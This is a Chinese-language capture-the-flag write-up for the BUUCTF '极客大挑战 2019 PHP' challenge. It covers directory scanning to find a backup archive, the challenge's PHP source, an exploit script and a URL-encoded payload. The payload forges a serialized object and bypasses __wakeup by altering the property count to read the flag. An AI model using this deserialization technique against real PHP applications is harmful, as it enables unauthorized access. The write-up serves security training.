【BUUCTF】[极客大挑战 2019]PHP

[TOC]

[极客大挑战 2019]PHP

打开网页是一个很可爱的小猫咪，提到了备份网站

在linux中使用disearch.py进行目录扫描。

搜索到了www.zip

下载解压，查看目录结构：

分析class.php:

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

执行destruct()魔术方法时，必须同时满足

username === admin            password = 100

才可以得到flag.

但是出现了wqakeup()方法使得username会变成guest，因此采用序列化字符串中对象的个数来绕过该方法。

EXP:

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
#进行url编码，防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//使用时将URL编码的结果中Name后面的2换成3或其他值
?>

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

输入时记得将Name后面的2改为3或其他

payload：http://33654565-450c-413d-b2bb-9d81273d6252.node4.buuoj.cn:81/index.php/?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D